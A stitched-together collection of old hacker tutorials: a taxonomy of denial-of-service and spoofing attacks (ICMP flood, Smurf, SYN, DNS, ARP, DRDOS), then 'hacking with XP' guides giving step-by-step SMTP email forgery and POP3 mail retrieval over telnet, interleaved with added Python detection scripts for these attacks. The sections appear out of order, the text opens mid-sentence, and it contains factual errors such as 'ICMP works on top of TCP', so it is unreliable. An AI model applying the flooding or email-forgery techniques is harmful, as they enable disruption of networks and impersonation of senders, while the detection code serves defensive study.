understand what I am explaining when I say "attack". When creating an open socket and crafting spoofed packets, these
programs tell the kernel they are going to construct their own IP headers. Usually this information is put on by the
kernel before the packet exits the machine. But in this instance we are telling the kernel we want to specify our own
information. Not all operating systems will allow this. And no, I don't have a detailed list of which do and which don't.
Most of the experiments I have conducted on my network used different versions of RedHat Linux, Mandrake Linux, and
Windows XP.


Chapter 2.

Section a.

There are several different types of packet attacks. There's the simple brute flood of ICMP packets which floods a network
and eats up all the available bandwidth. And then there are more sophisticated attacks like the Smurf or SYN/ACK attack.
All of these attacks target different things. While the SMURF attack may target the general network it's attacking, the
SYN/ACK attack targets a specific host or service running on a host. We also must take into consideration that when a target
is attacked it may not be the only machine affected. There are many routers and other boxes transferring the data between
point A and point B. Other people's legitimate data is flowing between them, and may be disrupted by the packet flood. Even
a top of the line router can only handle so much data. And unfortunately it is very easy to obtain source code for these
attacks all over the web. Let's take a more detailed look at each attack.


ICMP brute flood attack.

ICMP works on top of TCP. The ICMP protocol is simple yet very effective. It's used for error correcting and testing network
connectivity. Your average PING program uses ICMP packets to test network connectivity. By sending a small amount of
arbitrary data in an ECHO_REQUEST packet it waits for a reply from the target host, simple right? A typical ICMP packet is
called an ECHO_REQUEST. You send 4 or 5 of these at a target machine and when it arrives there it requests an ECHO_REPLY.
That's when everything is done according to design. If you want more info on an ICMP packet and how it works then read my
tutorial on that!
http://www.theory-x.org/dataclast/_content/MPS.txt

In this attack the source IP address is spoofed. So now hundreds, thousands of ECHO_REQUEST packets rush towards their
destination. They reach point B and request an ECHO_REPLY for every ECHO_REQUEST sent. Point B says OK and reads the source
IP. The source IP ends up being unreachable. But point B is waiting a small amount of time (milliseconds) to determine that
for every packet that's hitting it. It will be a few more moments before the process relinquishes this small bit of memory
back to the system. This adds up to a great deal of packets and memory allocation building up. Now if these packets are
coming from multiple source zombies (DDOS) then this means they're each coming from different routes. So even if one ISP
stops one attack, there are still many more zombie machines attacking the victim. All of this is eating up time and
bandwidth, because with every millisecond that passes more and more bandwidth is being taken up. Eventually point B can no
longer keep up with the ECHO_REQUESTS and his connection is completely flooded and of no use. On an unprotected system or
router this attack can be very consuming. This attack is also sometimes referred to as a bandwidth attack. Even if the
target is running an advanced firewall it cannot protect the wire it is connected to from being flooded with packets. There
have been changes in this attack as well. On the net there are what we call amplifiers. On every network there are the
network and subnet addresses. In many default configurations when you ping either one of these addresses they multiply the
echo requests by 4 or more. So a zombie would attack a vulnerable network (.0) or subnet address (.255) with a spoofed
source IP, being the victim's real IP. So even though the traffic becomes valid as far as IP addresses go, the victim gets
bombarded with massive ECHO_REPLY packets. You will see more of this description in other attacks, as it works for some of
those too.

[zombie machine] -->ICMP ECHO_REQUEST (source IP = 1.1.1.1) -->-->--> [target]
[??????????????] ICMP ECHO_REPLY (destination 1.1.1.1 ?)<-- [target]

Hopefully that simple drawing shows you exactly how this attack works. It's very very simple: massive ICMP packets with
spoofed addresses taking up network resources. The simplest of attacks.


Smurf attack.

(first part is a repeat from the ICMP attack) There have been changes in the ICMP attack. On the net there are what we call
amplifiers. On every network there are the network and subnet addresses. In many default configurations when you ping either
one of these addresses they multiply the echo requests by 4 or more. So a zombie would attack a vulnerable network (.0) or
subnet address (.255) with a spoofed source IP, being the victim's real IP. So even though the traffic becomes valid as far
as IP addresses go, the victim gets bombarded with massive ECHO_REPLY packets. You will see more of this description in
other attacks, as it works for those too.

You can try this attack on your home network by simply opening a packet sniffer on each machine that is on. Pick a machine,
any machine, and ping your broadcast address. Mine is 192.168.0.255. Immediately you see each machine receiving a broadcast
packet. Now imagine it's several hundred and each one has a spoofed source IP address. It's a brute ICMP attack on a massive
scale; the possibilities of this attack are endless. You could easily implement this attack in any way you chose. You could
spoof the victim's real IP as your source IP and create massive volumes of legit ECHO_REPLY packets. Even though it's valid
traffic, it's 4x or more times the normal load of valid traffic. This consumes the connection and valid traffic can't pass,
or passes so slowly it makes no difference to the end user.

[zombie machine] --> ICMP ECHO_REQUEST source ip = 10.2.2.2 --> to: broadcast router 4.1.0.255 (router multiplies the
ECHO_REPLY packets by 4x!) --> --> --> --> [victim 10.2.2.2]


SYN/ACK attack.

The SYN/ACK attack is a very powerful attack. SYN/ACK packets are also used in TCP hijacking, and the TCP/IP three way
handshake. When an application wants to connect with a server somewhere over the net via a TCP connection (connection vs
connectionless data transfer (UDP)) it first sends a SYN packet. The SYN packet tells the target machine he wants to make
a connection on a certain specified port, and then send data. When the target machine reads the SYN packet it replies to
the original host with a SYN packet of his own and an ACK (acknowledgement) packet with sequence and ack numbers. These SEQ
and ACK numbers are used to synchronize the data transfer; in case one or two packets get lost or slowed down along their
route, the data can be assembled again in the correct order. The original machine replies again with another SYN ACK packet
combination acknowledging the sequencing numbers and then it starts to send data. When it creates this connection a tiny
piece of memory is allocated to hold the connection while the packets are en route. Now a SYN/ACK attack would consist of
spoofing the source IP address on the original SYN packet. The target receives the request for a connection, reads the
spoofed source IP and tries to send its own SYN and ACK packet to a destination that does not exist. Most operating systems
will continue to send SYN/ACK packets if they don't receive a reply, as a method of error correction and guaranteed data
delivery. Just like in the ICMP attack, the machine has to wait a few milliseconds before abandoning all hope of reaching
the machine. So these tiny allocated spaces of memory are building up with every spoofed packet that arrives at the target.
This attack is very powerful and can disable a service running on the target machine in a matter of minutes. Not to mention
all the available bandwidth is eaten with thousands and thousands of spoofed packets. So there is the SYN/ACK attack in a
brief description.

[zombie machine] --> SYN packet (source IP 1.1.1.1, port = 23 telnet) (seq = 100) --> [target]
[??????????????] <-- SYN/ACK packets sent (seq = 300) (ack = 101) <-- [target]

As you can see from the simple drawing above the target machine has no idea who is sending the SYN packets and the telnet
server he is running on port 23 would most likely crash. At best the telnet daemon would not allow any other legitimate
traffic through, as it could not gather enough resources (memory, bandwidth) to make the connection due to all the spoofed
packets.
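The half-open connection build-up described above is also what a defender watches for. The following is an added example, not code from the paper: it replays a constructed packet trace (the paper's 1.1.1.x spoofed sources and port 23), keeps the table of connections that got a SYN but never the final ACK, as a host's SYN backlog or an IDS would, expires stale entries after an assumed timeout, and alerts once one port holds more half-open entries than an assumed limit. The server address, the limit and the timeout are assumptions chosen for the demonstration.

```python
"""Half-open (embryonic) TCP connection tracker.

Added example, not part of the original paper. Replays a constructed
list of packet records the way a host or an IDS would see them and
alerts when one listening port accumulates too many connections that
received a SYN but never the third handshake packet (ACK).
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts: float      # seconds since start of capture
    src: str
    dst: str
    dport: int     # destination port
    flags: str     # "S" = SYN, "SA" = SYN/ACK, "A" = ACK


SERVER = "10.0.0.5"          # protected host (constructed address)
HALF_OPEN_LIMIT = 20         # assumed alert threshold per listening port
BACKLOG_TIMEOUT = 30.0       # assumed seconds before a stale entry is dropped


def track_half_open(packets, server=SERVER, limit=HALF_OPEN_LIMIT, timeout=BACKLOG_TIMEOUT):
    """Return (alerts, half_open).

    alerts:    list of (ts, dport, half_open_count), one per burst on a port
    half_open: {dport: {client_ip: ts of its SYN}} still waiting at the end
    """
    half_open = defaultdict(dict)
    alerts = []
    for p in sorted(packets, key=lambda p: p.ts):
        # Expire entries older than the timeout, as a real stack does once
        # its SYN/ACK retransmissions are exhausted.
        for port in list(half_open):
            for ip, seen in list(half_open[port].items()):
                if p.ts - seen > timeout:
                    del half_open[port][ip]
        if p.dst == server and p.flags == "S":
            # New connection request: remember it until the final ACK arrives.
            half_open[p.dport].setdefault(p.src, p.ts)
            n = len(half_open[p.dport])
            if n > limit and (not alerts or alerts[-1][1] != p.dport):
                alerts.append((p.ts, p.dport, n))
        elif p.dst == server and p.flags == "A":
            # Third step of the handshake: the client really exists, clear it.
            half_open[p.dport].pop(p.src, None)
    return alerts, {port: dict(v) for port, v in half_open.items() if v}


def sample_trace():
    """Constructed trace: one completed handshake, then a burst of spoofed SYNs."""
    pkts = [
        Packet(0.00, "192.168.1.20", SERVER, 23, "S"),
        Packet(0.01, SERVER, "192.168.1.20", 51000, "SA"),
        Packet(0.02, "192.168.1.20", SERVER, 23, "A"),
    ]
    # Spoofed sources never answer the SYN/ACK, so these entries never clear.
    for i in range(1, 51):
        pkts.append(Packet(1.0 + i * 0.001, f"1.1.1.{i}", SERVER, 23, "S"))
    return pkts


if __name__ == "__main__":
    alerts, table = track_half_open(sample_trace())
    for ts, port, n in alerts:
        print(f"t={ts:.3f}s port {port}: {n} half-open connections (limit {HALF_OPEN_LIMIT})")
    print("still half-open on port 23:", len(table.get(23, {})))
```

The legitimate client disappears from the table as soon as its ACK arrives, while the spoofed 1.1.1.x sources stay until the timeout; on a real host the same distinction is what SYN cookies and a short backlog timeout exploit to keep the service reachable.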

Another use of this attack is to disconnect a user from their current TCP session, by spoofing SYN/ACK packets to a server
a client is currently using. An attacker would place a "FIN" flag in the packets; this tells the server the client is done
sending data. The client loses his connection and the attacker walks away undetected, because it only took one packet to
accomplish this.


UDP attack

UDP, short for USER DATAGRAM PROTOCOL, is a protocol that is used to transfer data. UDP offers very little error correction
and is used as an alternative means for data transfer. It doesn't require the 3 way handshake such as the SYN/ACK method,
so its initial attack may not take down a remote daemon as quickly. UDP is generally used to broadcast messages over a
network. A UDP attack would consist of spoofing the source IP addresses and specifying a port number like in the SYN attack
above. UDP packets are generally large because they are usually used on closed 100 Mb subnets (LANs). So an attack would set
flags in the packets and fragment them (break them up and flag where in the packet they broke, so they can be reassembled
on the receiving end). For example, in Windows 2000 there was a remote UDP DOS exploit that used the IKE service running on
port 500. All an attacker had to do was connect to port 500 on a random machine with that port open, start sending massive
UDP packets (above 500 bytes) to that service, and the CPU usage would hit 99% and the machine would lock up. The typical
ports that accept UDP packets are 7, 13, 19 and 37 on a Windows box.

DNS attack

The DNS attack is a special one. Not as easily crafted as the others, there aren't that many tools readily available to the
average script kiddie to construct such an attack. The DNS protocol is used for name resolution, 216.239.35.100 = google.com,
simple as that? Well not really. A DNS attack is based on the fact that a DNS query takes very little data and bandwidth to
create, but a DNS response is much bigger. So this is what a DNS attack would look like.

10.10.10.10 = victims IP

[dns query packet (who is google.com)] --> source IP is 10.10.10.10 --> [dns server]
[dns server] --> --> --> [dns response] [dns response] [dns response] --> [victim]

As you can see the attack is sort of relayed from a legitimate DNS server. Although the DNS response packets are 'legit'
there is a massive flood of them because the DNS server that is sending them is a very good machine on a very good
connection. The end user, most likely a home pc, gets flooded with these huge DNS response packets it never asked for.

ARP attack

The ARP attack is a special one; it can be used to 'hijack' a TCP connection currently in session or it can be used to
sniff the legitimate traffic on a wire other than your own, which is a very dangerous thing in the information world we
live in today. There are a few methods of this attack. Let's say person1, attacker, and server are all on the same subnet.
Person1 and server currently have an FTP session open. Attacker sends both server and person1 an ARP packet containing an
invalid MAC address. Now both of their ARP tables are messed up for at least 30 seconds. Server and person1 can't find that
invalid MAC address so they send their data to the IP it's associated with, the attacker. So in this case the attacker has a
sniffer set up and he's collecting a ton of data. Now the attacker (an advanced one at that) can issue commands as person1 to
the server. This attack takes timing and skill to pull off on the internet, but on a LAN it's very easy. It only allows for
maybe 30 or so seconds of sniffing, until their ARP table is constructed properly again.
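On the LAN side, the poisoned ARP tables described above leave a trace a sniffer can catch: an IP whose MAC binding suddenly changes, and one MAC answering for two IPs (the attacker answering for both server and person1). The following is an added example, not code from the paper; it feeds a constructed sequence of ARP replies through a small IP-to-MAC table and reports both signs. The addresses are constructed, and the "one MAC, several IPs" rule is a heuristic (a router holding several addresses on one interface trips it legitimately).

```python
"""ARP binding watcher for the LAN case of the ARP attack.

Added example, not part of the original paper. Tracks IP -> MAC bindings
seen in ARP replies and flags (a) an IP that changes MAC and (b) a MAC
that claims more than one IP, which is what the attacker in the text
does when it answers for both server and person1.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float   # seconds since start of capture
    ip: str     # sender protocol address
    mac: str    # sender hardware address


def watch_arp(replies):
    """Return (alerts, bindings).

    alerts:   tuples ("mac_changed", ts, ip, old_mac, new_mac) or
              ("mac_claims_multiple", ts, mac, (ip, ...))
    bindings: final {ip: mac} table
    """
    bindings = {}
    ips_per_mac = defaultdict(set)
    alerts = []
    for r in sorted(replies, key=lambda r: r.ts):
        prev = bindings.get(r.ip)
        if prev is not None and prev != r.mac:
            alerts.append(("mac_changed", r.ts, r.ip, prev, r.mac))
            ips_per_mac[prev].discard(r.ip)     # old owner no longer holds this IP
        bindings[r.ip] = r.mac
        ips_per_mac[r.mac].add(r.ip)
        if len(ips_per_mac[r.mac]) > 1:
            alerts.append(("mac_claims_multiple", r.ts, r.mac, tuple(sorted(ips_per_mac[r.mac]))))
    return alerts, bindings


# Constructed replies: legitimate bindings, the attacker's poisoned replies,
# then the real hosts re-announcing themselves about 30 seconds later.
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.0.1", "00:11:22:33:44:01"),    # server
    ArpReply(0.5, "192.168.0.2", "00:11:22:33:44:02"),    # person1
    ArpReply(10.0, "192.168.0.1", "00:11:22:33:44:66"),   # attacker claims server's IP
    ArpReply(10.1, "192.168.0.2", "00:11:22:33:44:66"),   # attacker claims person1's IP
    ArpReply(40.0, "192.168.0.1", "00:11:22:33:44:01"),   # tables rebuilt from real replies
    ArpReply(40.1, "192.168.0.2", "00:11:22:33:44:02"),
]


if __name__ == "__main__":
    alerts, bindings = watch_arp(SAMPLE_REPLIES)
    for a in alerts:
        print(a)
    print("final bindings:", bindings)
```

A static ARP entry for the gateway, or a switch feature that validates ARP against DHCP leases, removes the window this watcher is looking at; the watcher is the fallback where those are not available.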

DRDOS attack

A DRDOS attack uses a little of other attacks to inflict damage. This attack spoofs the source IP address of SYN packets
to the IP of the victim. It requires a third party. This is the part of the attack that makes it so easy. All it needs is
some ftp, webserver, telnet.. ANY service that will reply with an ACK packet, anywhere on the internet. Could be Angelfire's
free ftp servers, could be your neighbor's web server running off his 233 MHz Compaq with IIS 4.0. It doesn't matter! The SYN
packets are sent to that service's IP address and they of course reply with a steady stream of SYN/ACK packets to the victim,
most likely directed towards an open port on the victim's machine, crashing that service and the system. These attacks are
near impossible to track down. This attack is quite possibly the strongest DOS attack in my opinion. For every SYN packet
you send the middle man, it sends out up to 4 SYN/ACK combinations to the victim. And each time the victim doesn't respond
the middle man sends even more (error correction). This allows the attacker to construct a massive attack from just one
machine with a broadband connection. There are more dangers to this attack as well; there are hundreds of thousands of FTP
servers, webservers and many more services running on the net today that will deflect these SYN/ACK packets at the victim. So
in theory this attack could use any number of 'middle man' servers to bombard your network with packets.
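From the victim's side the Smurf, DNS and DRDOS attacks above all look alike: replies arrive (ECHO_REPLY, DNS answers, SYN/ACK) for requests the victim never sent. The following is an added example, not code from the paper, that turns that observation into a check: it replays a constructed packet trace, keeps a short-lived table of the victim's own outbound requests, and counts inbound replies that match no request, per reply type and reflector. The victim address reuses the paper's 10.10.10.10; the reflector addresses, sizes and the request timeout are constructed for the demonstration.

```python
"""Unsolicited-response counter for reflection floods (Smurf, DNS, DRDOS).

Added example, not part of the original paper. A reply is "solicited"
only if the victim sent a matching request to that peer within the
timeout; everything else is counted against the (reply kind, reflector)
pair so the reflectors hitting the victim can be listed.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

# Which request each kind of reply must be paired with.
REQUEST_FOR = {"echo_reply": "echo_request", "dns_response": "dns_query", "synack": "syn"}
REQUEST_TIMEOUT = 5.0        # assumed seconds an outbound request stays pending
VICTIM = "10.10.10.10"       # the paper's victim address


@dataclass(frozen=True)
class Packet:
    ts: float
    src: str
    dst: str
    kind: str     # echo_request, echo_reply, dns_query, dns_response, syn, synack
    size: int     # bytes on the wire


def find_unsolicited(packets, victim=VICTIM, timeout=REQUEST_TIMEOUT):
    """Return {(reply kind, reflector ip): {"unsolicited": n, "bytes": b}}
    for replies that matched no outbound request from `victim`."""
    pending = defaultdict(deque)       # (request kind, peer) -> timestamps of open requests
    stats = defaultdict(lambda: {"unsolicited": 0, "bytes": 0})
    for p in sorted(packets, key=lambda p: p.ts):
        if p.src == victim and p.kind in REQUEST_FOR.values():
            pending[(p.kind, p.dst)].append(p.ts)
        elif p.dst == victim and p.kind in REQUEST_FOR:
            q = pending[(REQUEST_FOR[p.kind], p.src)]
            while q and p.ts - q[0] > timeout:   # forget requests that are too old
                q.popleft()
            if q:
                q.popleft()                      # a real answer to something we sent
            else:
                s = stats[(p.kind, p.src)]
                s["unsolicited"] += 1
                s["bytes"] += p.size
    return dict(stats)


def top_reflectors(stats):
    """(key, stats) pairs sorted by unsolicited packet count, largest first."""
    return sorted(stats.items(), key=lambda kv: kv[1]["unsolicited"], reverse=True)


def sample_trace():
    """Constructed trace: two legitimate exchanges, then three reflection floods."""
    pkts = [
        Packet(0.00, VICTIM, "192.0.2.53", "dns_query", 60),
        Packet(0.05, "192.0.2.53", VICTIM, "dns_response", 500),   # answer to our own query
        Packet(1.00, VICTIM, "192.0.2.1", "echo_request", 64),
        Packet(1.02, "192.0.2.1", VICTIM, "echo_reply", 64),       # answer to our own ping
    ]
    # DNS attack: answers from a resolver the victim never queried.
    pkts += [Packet(5 + i * 0.01, "4.2.2.2", VICTIM, "dns_response", 512) for i in range(30)]
    # Smurf: ECHO_REPLY from a host on an amplifier subnet.
    pkts += [Packet(6 + i * 0.01, "4.1.0.7", VICTIM, "echo_reply", 64) for i in range(8)]
    # DRDOS: SYN/ACK from a third-party server that received spoofed SYNs.
    pkts += [Packet(7 + i * 0.01, "203.0.113.9", VICTIM, "synack", 60) for i in range(12)]
    return pkts


if __name__ == "__main__":
    for (kind, reflector), s in top_reflectors(find_unsolicited(sample_trace())):
        print(f"{kind:13s} from {reflector:13s}: {s['unsolicited']:3d} unsolicited, {s['bytes']} bytes")
```

The two legitimate exchanges never appear in the output because their requests were pending when the replies arrived; a stateful firewall applies exactly this rule at line rate, which is why the text's point about the wire still stands: the filter drops the packets, but they have already consumed the link.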


hacking with xp 3  

How to Forge Email with Windows XP Telnet

Want a computer you can telnet into and mess around with, and not get into trouble no matter what you do to it? I've set up my
techbroker.com (206.61.52.33) with user xyz, password guest for you to play with. Here's how to forge email to xyz@techbroker.com using
telnet. Start with the command:

C:\>telnet techbroker.com 25
Connecting To Techbroker.com

220 Service ready

Now you type in who you want the message to appear to come from:

helo santa@techbroker.com
Techbroker.com will answer:

250 host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed

Your next command:
data
354 Start main input; end with <CRLF>.<CRLF>

Newbie note: <CRLF> just means hit return. In case you can't see that little period between the <CRLF>s, what you do to end composing your email is to hit enter, type a period, then hit enter again.

Anyhow, try typing:

This is a test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the
message we just composed looks like:

Status: R
X-status: N

This is a test.

That's a pretty pathetic forged email, huh? No "from", no date.
However, you can make your headers better by using a trick with the data command. After you give it, you can insert as many headers as you choose. The trick is easier to show than explain:

220 Service ready
helo santa@northpole.org
250 host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:
250 Requested mail action okay, completed
data
354 Start main input; end with <CRLF>.<CRLF>
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.

The trick is to start each line you want in the headers with one word
followed by a colon, and then a line followed by "return". As soon as
you write a line that doesn't begin this way, the rest of what you
type goes into the body of the email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up in the header. Some mail servers would show both "from" addresses.
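The "word followed by a colon" rule above is exactly how a mail reader splits headers from body, and it is also why the forged message is easy to spot: nothing the server normally stamps on a message is there. The following is an added example, not code from the guide. It implements that split over the two messages shown in the text, then lists the forgery indicators a receiving side would look at: a From: header that disagrees with the envelope MAIL FROM address, and missing Received, Message-ID and Date headers. The envelope address is passed in as a parameter because it is not part of the message text; the "relayed" message is constructed for contrast.

```python
"""Header/body split and forgery indicators for a raw mail message.

Added example, not part of the original guide. Lines of the form
"Word: value" at the top of the message are headers; the first line
that does not match (or a blank line) starts the body.
"""
import re

HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")
EXPECTED = ("received", "message-id", "date", "from")   # normally present on relayed mail
ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+")


def split_message(raw):
    """Return (headers, body): headers as (name, value) pairs in order, body as text."""
    headers, body_lines, in_headers = [], [], True
    for line in raw.splitlines():
        if in_headers:
            if line == "":                  # a blank line formally ends the header block
                in_headers = False
                continue
            m = HEADER_RE.match(line)
            if m:
                headers.append((m.group(1), m.group(2)))
                continue
            in_headers = False              # first non-header line begins the body
        body_lines.append(line)
    return headers, "\n".join(body_lines)


def forgery_indicators(raw, envelope_from):
    """Return a list of strings describing what looks forged about `raw`,
    given the envelope sender (MAIL FROM) the server saw."""
    headers, _ = split_message(raw)
    by_name = {name.lower(): value for name, value in headers}
    findings = [f"missing {h}" for h in EXPECTED if h not in by_name]
    header_from = by_name.get("from")
    if header_from is not None:
        m = ADDR_RE.search(header_from)
        if m and m.group(0).lower() != envelope_from.lower():
            findings.append(f"from header {m.group(0)} != envelope {envelope_from}")
    return findings


# The two messages from the text, as typed after the DATA command.
FORGED_PLAIN = "This is a test."
FORGED_WITH_HEADERS = (
    "from:santa@deer.northpole.org\n"
    "Date: Mon, 21 Oct 2002 10:09:16 -0500\n"
    "Subject: Rudolf\n"
    "This is a Santa test."
)
# Constructed for contrast: what a relaying server would have stamped on it.
RELAYED = (
    "Received: from mail.example.test (mail.example.test [192.0.2.10])\n"
    "Message-ID: <constructed-id@example.test>\n"
    "Date: Mon, 21 Oct 2002 10:09:16 -0500\n"
    "From: alice@example.test\n"
    "Subject: hello\n"
    "\n"
    "Body text."
)


if __name__ == "__main__":
    for label, msg, env in (("plain", FORGED_PLAIN, "santa@techbroker.com"),
                            ("with headers", FORGED_WITH_HEADERS, "santa@northpole.com"),
                            ("relayed", RELAYED, "alice@example.test")):
        print(label, "->", forgery_indicators(msg, env) or "no indicators")
```

Note that a body line such as "Note: see below" typed right after the DATA command would be swallowed as a header by this rule, which is the same behaviour the text relies on; the blank line is what makes the boundary unambiguous.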

You can forge email on techbroker.com within one strict limitation.
Your email has to go to someone at techbroker.com. If you can find any way to send email to someone outside techbroker, let us know, because you will have broken our security, muhahaha! Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet:

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:
user xyz
+OK user is known

Then type in this:
pass test
+OK mail drop has 2 message(s)

retr 1
+OK message follows
This is a test.

If you want to know all possible commands, give this command:

help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP

Unless you use a weird online provider like AOL, you can use these
same tricks to send and receive your own email. Or you can forge email to a friend by telnetting to his or her online provider's email
sending computer(s).


hacking with xp 2  

How to Telnet with Windows XP

The queen of hacker commands is telnet. To get Windows help for
telnet, in the cmd.exe window give the command:

C:\>telnet /?

Here's what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]
-a Attempt automatic logon. Same as -l option except uses
the currently logged on user's name.
-e Escape character to enter telnet client prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system.
Requires that the remote system support the TELNET ENVIRON
option.
-t Specifies terminal type.
Supported term types are vt100, vt52, ansi and vtnt only.
host Specifies the hostname or IP address of the remote computer
to connect to.

port Specifies a port number or service name.

****************
Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn't block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name.
****************

The simplest use of telnet is to log into a remote computer. Give the
command:

C:/>telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)

If this computer is set up to let people log into accounts, you may
get the message:

login:

Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.

****************
Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.
****************

Then comes the message:

Password:

Again, be exact in typing in your password.

What if this doesn't work?

Every day people write to me complaining they can't telnet. That is
usually because they try to telnet into a computer, or a port on a
computer that is set up to refuse telnet connections. Here's what it
might look like when a computer refuses a telnet connection:

C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

Or you might see:

C:\ >telnet techbroker.com
Connecting To techbroker.com...Could not open connection to the host, on port 23.
No connection could be made because the target machine actively
refused it.

If you just give the telnet command without giving a port number, it
will automatically try to connect on port 23, which sometimes runs a
telnet server.

**************
Newbie note: your Windows computer has a telnet client program,
meaning it will let you telnet out of it. However you have to install
a telnet server before anyone can telnet into port 23 on your
computer.

*************

If telnet failed to connect, possibly the computer you were trying to
telnet into was down or just plain no longer in existence. Maybe the
people who run that computer don't want you to telnet into it.

How to Telnet into a Shell Account

Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed -without doing anything illegal --against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:

C:/telnet freeshell.org 22

SSH-1.99-OpenSSH_3.4p1

That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at
. You can get a free SSH client program from
.

One reason most hackers have shell accounts on Internet servers is because you can meet the real hackers there. When you've logged in, give the command w or who. That gives a list of user names. You can talk to other users with the talk command. Another fun thing, if your shell account allows it, is to give the command

ps -auxww

It might tell you what commands and processes other users are running. Ask other users what they are doing and they might teach you something. Just be careful not to be a pest!

***************
You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.
*************

Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.

If I try to telnet to this email program from outside this computer,
here's what happens:

C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3...Could not open connection to the host, on
port 25.
No connection could be made because the target machine actively
refused it.

However, if I log into an account on 10.0.0.3 and then telnet from
inside to port 25, here's what I get:

Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun...
cmeinel@test-box:~> telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical
address meaning localhost, the same computer you are logged into]
Connected to localhost.
Escape character is '^]'.
220 test-box.local ESMTP Postfix

The reason I keep this port 25 hidden behind a firewall is to keep
people from using it to try to break in or to forge email. Now the
ubergeniuses reading this will start to make fun of me because no
Internet address that begins with 10. is reachable from the Internet.
However, sometimes I place this "test-box" computer online with a
static Internet address, meaning whenever it is on the Internet, it
always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.

***************
Newbie note: What is all this about headers? It's stuff at the
beginning of an email that may - or may not - tell you a lot about
where it came from and when. To see full headers, in Outlook click
view -> full headers. In Eudora, click the "Blah blah blah" icon.

****************


hacking with xp 1  

Part I: The Magic of DOS

In this guide you will learn how to telnet , forge email, use
nslookup and netcat with Windows XP.

So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?

****************
Luser Alert: Anyone who thinks this GTMHH will reveal how to blow up people's TV sets and steal Sandra Bullock's email is going to find out that I won't tell them how.
****************

The key to doing amazing things with XP is as simple as D O S. Yes, that's right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Windows 3, and DOS only operating systems.

The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won't run right in cmd.exe will work in command.com.

****************
Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can compare cmd.exe to bash if I want to. Nanny nanny nah nah.
****************

DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.

****************
You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won't protect you because Microsoft owns Hotmail and they will never give you permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying something like this:

